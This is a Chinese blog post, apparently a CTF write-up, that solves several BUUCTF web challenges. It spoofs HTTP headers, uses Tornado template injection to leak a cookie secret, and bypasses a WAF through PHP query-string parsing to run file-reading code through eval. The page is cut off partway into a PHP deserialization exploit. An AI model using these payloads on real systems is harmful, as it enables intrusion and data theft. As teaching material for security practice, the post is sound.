<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>buuctf-web(二) | 忆 执 昔 来 的 旅 途</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  <meta name="keywords" content="CTFWebBUUCTF" />
  
  
  
  
  <meta name="description" content="概述：BUUCTF-WEB 十~二十道题目，难度较前十道略有提升，内容有：文件上传、HTTP 头部、SSTI、PHP字符串特性、序列化与反序列化、SQL注入、网站的备份文件。">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-WEB(二)">
<meta property="og:url" content="https://xizhi-future.github.io/2021/06/04/BUUCTF-WEB%EF%BC%88%E4%BA%8C%EF%BC%89/index.html">
<meta property="og:site_name" content="忆 执 昔 来 的 旅 途">
<meta property="og:description" content="概述：BUUCTF-WEB 十~二十道题目，难度较前十道略有提升，内容有：文件上传、HTTP 头部、SSTI、PHP字符串特性、序列化与反序列化、SQL注入、网站的备份文件。">
<meta property="og:locale">
<meta property="og:image" content="https://i.loli.net/2021/05/28/ZQ4mytUlC7NIcWh.png">
<meta property="og:image" content="https://i.loli.net/2021/05/28/MTGsq5vtBJozEKk.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/IZL6Xrbu85P4Tpz.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/kxwAKbC94r7gEYa.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/pJlwDsXNMHxYrk7.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/U2X7kSAIuFhBR3j.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/vqzAIYNhVkuxwW4.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/Jx2ercONdRIAop9.png">
<meta property="og:image" content="https://i.loli.net/2021/05/28/HY5n3LkhzGvmXVa.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/8kvC7PIAnOzMqb3.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/soGSYXPgxUf54by.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/WnKR4y5czYb2BM8.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/VkjGzKiOPpb63yf.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/OQ3JWt8evF1UPsq.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/Uds4RP3wqxg69fe.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/kYWlSRZABKNFQ4I.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/A7mGDtwczYH9OBj.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/YCGBi7I5uktXHhW.png">
<meta property="og:image" content="https://i.loli.net/2021/05/29/7pOwsXyAPESITJv.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/Mgrq4Sb5szHhpu9.png">
<meta property="og:image" content="https://i.loli.net/2021/05/30/rce32jAqIYXRzuE.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/hltLVI1OdZSrTui.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/Get7gWmync9S3ka.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/N6b784u2PHA1hKw.png">
<meta property="og:image" content="https://i.loli.net/2021/06/04/DWgonFrZSepNQkC.png">
<meta property="og:image" content="https://i.loli.net/2021/06/04/m98H5qVOeGAnNvo.png">
<meta property="og:image" content="https://i.loli.net/2021/06/04/boaRlQ5x8vAdyEY.png">
<meta property="og:image" content="https://i.loli.net/2021/06/04/mhuZaDQe9NKIO2q.png">
<meta property="og:image" content="https://i.loli.net/2021/06/04/hzMjc8yRePDLwpo.png">
<meta property="article:published_time" content="2021-06-04T10:22:55.000Z">
<meta property="article:modified_time" content="2021-10-07T10:14:40.334Z">
<meta property="article:author" content="xizhi-future">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="BUUCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/05/28/ZQ4mytUlC7NIcWh.png">
  
    <link rel="alternate" href="/atom.xml" title="忆 执 昔 来 的 旅 途" type="application/atom+xml">
  

  

  <link rel="icon" href="/css/images/mylogo.jpg">
  <link rel="apple-touch-icon" href="/css/images/mylogo.jpg">
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link href="https://fonts.googleapis.com/css?family=Open+Sans|Montserrat:700" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Roboto:400,300,300italic,400italic" rel="stylesheet" type="text/css">
  <link href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet">
  <style type="text/css">
    @font-face{font-family:futura-pt; src:url("/css/fonts/FuturaPTBold.otf") format("woff");font-weight:500;font-style:normal;}
    @font-face{font-family:futura-pt-light; src:url("/css/fonts/FuturaPTBook.otf") format("woff");font-weight:lighter;font-style:normal;}
    @font-face{font-family:futura-pt-italic; src:url("/css/fonts/FuturaPTBookOblique.otf") format("woff");font-weight:400;font-style:italic;}
}

  </style>
  
<link rel="stylesheet" href="/css/style.css">


  
<script src="/js/jquery-3.1.1.min.js"></script>

  
<script src="/js/bootstrap.js"></script>


  <!-- Bootstrap core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.css" >

  
    
<link rel="stylesheet" href="/css/dialog.css">

  

  

  
    <link rel="stylesheet" href="/css/header-post.css" >
  

  
  
  
    <link rel="stylesheet" href="/css/vdonate.css" >
  

<meta name="generator" content="Hexo 5.4.0"></head>



  <body data-spy="scroll" data-target="#toc" data-offset="50">


  
  <div id="container">
    <div id="wrap">
      
        <header>

    <div id="allheader" class="navbar navbar-default navbar-static-top" role="navigation">
        <div class="navbar-inner">
          
          <div class="container"> 
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
              <span class="sr-only">Toggle navigation</span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
            </button>

            
              <a class="brand" style="
                 margin-top: 0px;"  
                href="#" data-toggle="modal" data-target="#myModal" >
                  <img width="124px" height="124px" alt="Hike News" src="/css/images/mylogo.jpg">
              </a>
            
            
            <div class="navbar-collapse collapse">
              <ul class="hnav navbar-nav">
                
                  <li> <a class="main-nav-link" href="/">Home</a> </li>
                
                  <li> <a class="main-nav-link" href="/archives">Archives</a> </li>
                
                  <li> <a class="main-nav-link" href="/categories">Categories</a> </li>
                
                  <li> <a class="main-nav-link" href="/tags">Tags</a> </li>
                
                  <li> <a class="main-nav-link" href="/essayists">随笔</a> </li>
                
                  <li> <a class="main-nav-link" href="/playist">playist</a> </li>
                
                  <li> <a class="main-nav-link" href="/about">About</a> </li>
                
                  <li><div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div></li>
            </div>
          </div>
                
      </div>
    </div>

</header>



      
            
      <div id="content" class="outer">
        
          <section id="main" style="float:none;"><article id="post-BUUCTF-WEB（二）" style="width: 75%; float:left;" class="article article-type-post" itemscope itemprop="blogPost" >
  <div id="articleInner" class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="thumb" class="article-title" itemprop="name">
      BUUCTF-WEB(二)
    </h1>
  

      </header>
    
    <div class="article-meta">
      
	<a href="/2021/06/04/BUUCTF-WEB%EF%BC%88%E4%BA%8C%EF%BC%89/" class="article-date">
	  <time datetime="2021-06-04T10:22:55.000Z" itemprop="datePublished">2021-06-04</time>
	</a>

      
    <a class="article-category-link" href="/categories/BUUCTF/">BUUCTF</a>

      
	<a class="article-views">
	<span id="busuanzi_container_page_pv">
		PV:<span id="busuanzi_value_page_pv"></span>
	</span>
	</a>

      

    </div>
    <div class="article-entry" itemprop="articleBody">
      
        <p>概述：BUUCTF-WEB 十~二十道题目，难度较前十道略有提升，内容有：文件上传、HTTP 头部、SSTI、PHP字符串特性、序列化与反序列化、SQL注入、网站的备份文件。</p>
<span id="more"></span>

<h1 id="一、-极客大挑战-2019-Knife1"><a href="#一、-极客大挑战-2019-Knife1" class="headerlink" title="一、[极客大挑战 2019]Knife1"></a>一、[极客大挑战 2019]Knife1</h1><p><strong>考点：连 shell 工具：菜刀、蚁剑</strong></p>
<p><img src="https://i.loli.net/2021/05/28/ZQ4mytUlC7NIcWh.png" alt="image-20210528163328872"></p>
<p>根据界面的提示，直接上菜刀或者是蚁剑，根目录下得到 flag</p>
<p><img src="https://i.loli.net/2021/05/28/MTGsq5vtBJozEKk.png" alt="image-20210528163411310"></p>
<h1 id="二、-极客大挑战-2019-Http1"><a href="#二、-极客大挑战-2019-Http1" class="headerlink" title="二、[极客大挑战 2019]Http1"></a>二、[极客大挑战 2019]Http1</h1><p><strong>考点：HTTP header：Referer、User-Agent、X-Forwarded-For</strong></p>
<p>抓包查看 发现 <code>Secret.php</code>，访问发现</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#It doesn&#x27;t come from &#x27;https://www.Sycsecret.com&#x27;</span></span><br><span class="line">添加	Referer: https://www.Sycsecret.com</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#Please use &quot;Syclover&quot; browser</span></span><br><span class="line">修改  User-Agent: Syclover</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#No!!! you can only read this locally!!!</span></span><br><span class="line">添加  X-Forwarded-For: 127.0.0.1</span><br></pre></td></tr></table></figure>

<p>得到 flag</p>
<p><strong>总结：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#HTTP header</span></span><br><span class="line">Referer：</span><br><span class="line">	当浏览器向Web服务器发送请求时，在 HTTP header 带上中带上 Referer 字段，用来告诉浏览器网页是从哪个页面链接过来的。常用在防盗链和防恶意请求中。</span><br><span class="line"></span><br><span class="line">User-Agent：</span><br><span class="line">	用于传输用户使用的是什么浏览器。有些网站为了防止爬虫，会检验User-Agent，只有当是用户访问的时候才会传输数据。</span><br><span class="line"></span><br><span class="line">X-Forwarded-For：</span><br><span class="line">	是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段，即用来表示HTTP请求端的真实IP。</span><br><span class="line">	理解：当今多数缓存服务器的用户为大型ISP，为了通过缓存的方式来降低他们的外部带宽，他们常常通过鼓励或强制用户使用代理服务器来接入互联网。如果没有 XFF，所有通过代理服务器的连接只会显示代理服务器的IP地址，而不会显示发起请求的原始IP地址，而如果连接的原始IP地址不可得，恶意访问的检测与预防的难度将大大增加。</span><br><span class="line">	所以如果我们使用透明代理去上网，那么在透明代理发送给服务器端的HTTP请求中会包含x-forward-for信息，用来传输最原始的IP地址。</span><br></pre></td></tr></table></figure>

<h1 id="三、-护网2018-easy-tornado1"><a href="#三、-护网2018-easy-tornado1" class="headerlink" title="三、[护网2018]easy_tornado1"></a>三、[护网2018]easy_tornado1</h1><p><strong>考点：ssti</strong></p>
<p>查看三个文件内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">flag <span class="keyword">in</span> /fllllllllllllag</span><br><span class="line"></span><br><span class="line">/welcome.txt</span><br><span class="line">render		<span class="comment">#提示：SSTI 渲染</span></span><br><span class="line"></span><br><span class="line">/hints.txt</span><br><span class="line">md5(cookie_secret+md5(filename)) <span class="comment">#我们需要找到 cookie_secret</span></span><br></pre></td></tr></table></figure>

<p>抓包查看：</p>
<p>查看每个文件时，GET将会传入两参数：filename 和 filehash ，然后回显给我们文件内容。</p>
<p>发现：当传入的参数值错误时，将自动跳转转到 <code>/error?msg=Error</code> 页面，并且含参 <code>?msg=</code> ，尝试 <code>?msg=&#123;&#123;3&#125;&#125;</code>，可以回显，紧接着 <code>?msg=&#123;&#123;3*7&#125;&#125;</code> ，返回</p>
<p><img src="https://i.loli.net/2021/06/03/IZL6Xrbu85P4Tpz.png" alt="image-20210603102218062"></p>
<p>显然：被过滤掉了</p>
<p>从题目得知：Tornado 是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架（包括大多数 Python 的框架）有着明显的区别：它是非阻塞式服务器，而且速度相当快。</p>
<p>搜索 Tornado 框架的配置文件：<code>handler.settings</code></p>
<p><a target="_blank" rel="noopener" href="https://tornado-zh.readthedocs.io/zh/latest/web.html">https://tornado-zh.readthedocs.io/zh/latest/web.html</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?msg=&#123;&#123;handler_settings&#125;&#125;	<span class="comment"># cookie_secret:72a8e052-2f41-47ce-92b6-63610540b665</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/03/kxwAKbC94r7gEYa.png" alt="image-20210603103441182"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a = md5(<span class="string">&quot;/fllllllllllllag&quot;</span>);</span><br><span class="line">echo md5(<span class="string">&quot;72a8e052-2f41-47ce-92b6-63610540b665&quot;</span>.$a);</span><br><span class="line">?&gt;</span><br><span class="line"><span class="comment">#传入</span></span><br><span class="line"><span class="comment">#?filename=/fllllllllllllag&amp;filehash=d7965e5b71144dc21155aa80d0bd721f</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/03/pJlwDsXNMHxYrk7.png" alt="image-20210603104144821"></p>
<h1 id="四、-RoarCTF-2019-Easy-Calc1"><a href="#四、-RoarCTF-2019-Easy-Calc1" class="headerlink" title="四、[RoarCTF 2019]Easy Calc1"></a>四、[RoarCTF 2019]Easy Calc1</h1><p><strong>考点：PHP 的字符串解析特性</strong></p>
<p>查看源码，发现</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">    $(<span class="string">&#x27;#calc&#x27;</span>).submit(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        $.ajax(&#123;</span><br><span class="line">            url:<span class="string">&quot;calc.php?num=&quot;</span>+encodeURIComponent($(<span class="string">&quot;#content&quot;</span>).val()),</span><br><span class="line">            type:<span class="string">&#x27;GET&#x27;</span>,</span><br><span class="line">            success:<span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>&#123;</span><br><span class="line">                $(<span class="string">&quot;#result&quot;</span>).html(`&lt;div <span class="class"><span class="keyword">class</span>=&quot;<span class="title">alert</span> <span class="title">alert</span>-<span class="title">success</span>&quot;&gt;</span></span><br><span class="line"><span class="class">            &lt;<span class="title">strong</span>&gt;答案:&lt;/<span class="title">strong</span>&gt;$</span>&#123;data&#125;</span><br><span class="line">            &lt;/div&gt;`);</span><br><span class="line">            &#125;,</span><br><span class="line">            <span class="built_in">error</span>:<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">                alert(<span class="string">&quot;这啥?算不来!&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;)</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>访问 calc.php ，得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">        <span class="variable">$blacklist</span> = [<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;\t&#x27;</span>, <span class="string">&#x27;\r&#x27;</span>, <span class="string">&#x27;\n&#x27;</span>,<span class="string">&#x27;\&#x27;&#x27;</span>, <span class="string">&#x27;&quot;&#x27;</span>, <span class="string">&#x27;`&#x27;</span>, <span class="string">&#x27;\[&#x27;</span>, <span class="string">&#x27;\]&#x27;</span>,<span class="string">&#x27;\$&#x27;</span>,<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;\^&#x27;</span>];</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$blacklist</span> <span class="keyword">as</span> <span class="variable">$blackitem</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/&#x27;</span> . <span class="variable">$blackitem</span> . <span class="string">&#x27;/m&#x27;</span>, <span class="variable">$str</span>)) &#123;</span><br><span class="line">                        <span class="keyword">die</span>(<span class="string">&quot;what are you want to do?&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">&#x27;echo &#x27;</span>.<span class="variable">$str</span>.<span class="string">&#x27;;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>不允许我们传入字母，我们可以传入 <code>? num=</code> ，来绕过。过程是：WAF检测时检测不到 <code>&quot;num&quot;</code> ，这个变量，因为只存在 <code>&quot; num&quot; </code>，这样就饶过了WAF判断；随后PHP在解析的时候会将这个空格去掉，从而使我们的代码在包含非法字符的情况下还能正常运行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%<span class="number">20</span>num=qqq</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/30/U2X7kSAIuFhBR3j.png" alt="image-20210528234523602"></p>
<p><strong>思路：绕过 WAF，危险函数传参</strong></p>
<p>注：由于 <code>/</code> 被过滤掉了，我们可以使用 ascii 编码函数 <code>chr()</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/calc.php? num=var_dump(scandir(chr(<span class="number">47</span>)))</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/29/vqzAIYNhVkuxwW4.png" alt="image-20210528235637938"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/calc.php? num=file_get_contents(chr(<span class="number">47</span>).chr(<span class="number">102</span>).chr(<span class="number">49</span>).chr(<span class="number">97</span>).chr(<span class="number">103</span>).chr(<span class="number">103</span>))</span><br></pre></td></tr></table></figure>

<p>得到 flag</p>
<h2 id="4-1-总结：PHP-字符串解析特性"><a href="#4-1-总结：PHP-字符串解析特性" class="headerlink" title="4.1 总结：PHP 字符串解析特性"></a>4.1 总结：PHP 字符串解析特性</h2><blockquote>
<p><strong>概述：</strong>PHP 在用 GET、POST等传入参数（即传入所要查询的字符串）时，会将其转换为内部关联的 <code>$_GET 和 $_POST</code> 。比如：我们传入 <code>/?path=flag</code> ，将会变为 <code>Array([path] =&gt; &quot;flag&quot;)</code> 。</p>
<p><strong>特性：</strong>查询字符串在解析的过程中会将某些字符删除或者是用下环线来代替。比如：我们传入 <code>/?%20msg[id%00=10</code> ，它仍将会被解析成 <code>Array([msg_id] =&gt; 10)</code> 。</p>
<p><strong>利用：</strong>当我们遇到传入的参数只允许是数字时，我们可以通过传入 <code>/?%20msg[id%00=10</code> 来进行绕过WAF。</p>
</blockquote>
<p><strong>PHP 会将所有参数转换成为有效的变量名，有以下两种方式：</strong></p>
<ul>
<li>删除空白字符：<code>%20 %00  将变为空</code></li>
<li>将某些字符转换成为下划线：<code>+ [ ] 等将变为 _</code> </li>
</ul>
<p><strong>测试：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">parse_str() 函数把查询字符串解析到变量中。</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#测试代码</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">parse_str(<span class="string">&quot;msg_id=10&quot;</span>,<span class="variable">$a</span>);</span><br><span class="line">print_r(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/29/Jx2ercONdRIAop9.png" alt="image-20210528231612155"></p>
<p><img src="https://i.loli.net/2021/05/28/HY5n3LkhzGvmXVa.png" alt="image-20210528231647724"></p>
<p><img src="https://i.loli.net/2021/05/30/8kvC7PIAnOzMqb3.png" alt="image-20210528232140784"></p>
<p><img src="https://i.loli.net/2021/05/30/soGSYXPgxUf54by.png" alt="image-20210528232736397"></p>
<p><strong>常见利用：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scandir() 函数返回指定目录中的文件和目录的数组。</span><br></pre></td></tr></table></figure>

<h1 id="五、-极客大挑战-2019-PHP1"><a href="#五、-极客大挑战-2019-PHP1" class="headerlink" title="五、[极客大挑战 2019]PHP1"></a>五、[极客大挑战 2019]PHP1</h1><p><strong>考点：网站备份文件、序列化与反序列化</strong></p>
<p>根据题目的提示：有良好的备份王真的习惯。发现网站的备份文件：<code>www.zip</code></p>
<p><img src="https://i.loli.net/2021/05/29/WnKR4y5czYb2BM8.png" alt="image-20210529003657326"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#flag.php 文件</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$flag</span> = <span class="string">&#x27;Syc&#123;dog_dog_dog_dog&#125;&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#class.php文件：存在一些魔术方法，涉及到序列化与反序列化漏洞</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Name</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$username</span> = <span class="string">&#x27;nonono&#x27;</span>;	<span class="comment">//注意是私有按量</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$password</span> = <span class="string">&#x27;yesyes&#x27;</span>;	<span class="comment">//注意是私有按量</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$username</span>,<span class="variable">$password</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;username = <span class="variable">$username</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;password = <span class="variable">$password</span>;</span><br><span class="line">        <span class="comment">#创建对象之后被调用</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;username = <span class="string">&#x27;guest&#x27;</span>;</span><br><span class="line">        <span class="comment">#反序列化时被触发</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;password != <span class="number">100</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;You name is: &quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;username;<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;You password is: &quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;password;<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">die</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;username === <span class="string">&#x27;admin&#x27;</span>) &#123;</span><br><span class="line">            <span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;hello my friend~~&lt;/br&gt;sorry i can&#x27;t give you the flag!&quot;</span>;</span><br><span class="line">            <span class="keyword">die</span>();           </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">#对象被销毁时被触发</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php文件</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">include</span> <span class="string">&#x27;class.php&#x27;</span>;			<span class="comment">//调用 class.php</span></span><br><span class="line">    <span class="variable">$select</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;select&#x27;</span>];</span><br><span class="line">    <span class="variable">$res</span>=unserialize(@<span class="variable">$select</span>);		<span class="comment">//对输入进行反序列化</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以发现，当index.php文件中对输入内容进行反序列化时，将会调用魔术方法 <code>__wakeup()</code>，从而将 username 的值进行覆盖为 <code>guest</code> 。而 <code>__destruct()</code> 中明显知道只有 <code>username=admin</code> 时，才会显示 flag。因此我们必须绕过 <code>__wakeup()</code>。</p>
<p><strong>构造：</strong></p>
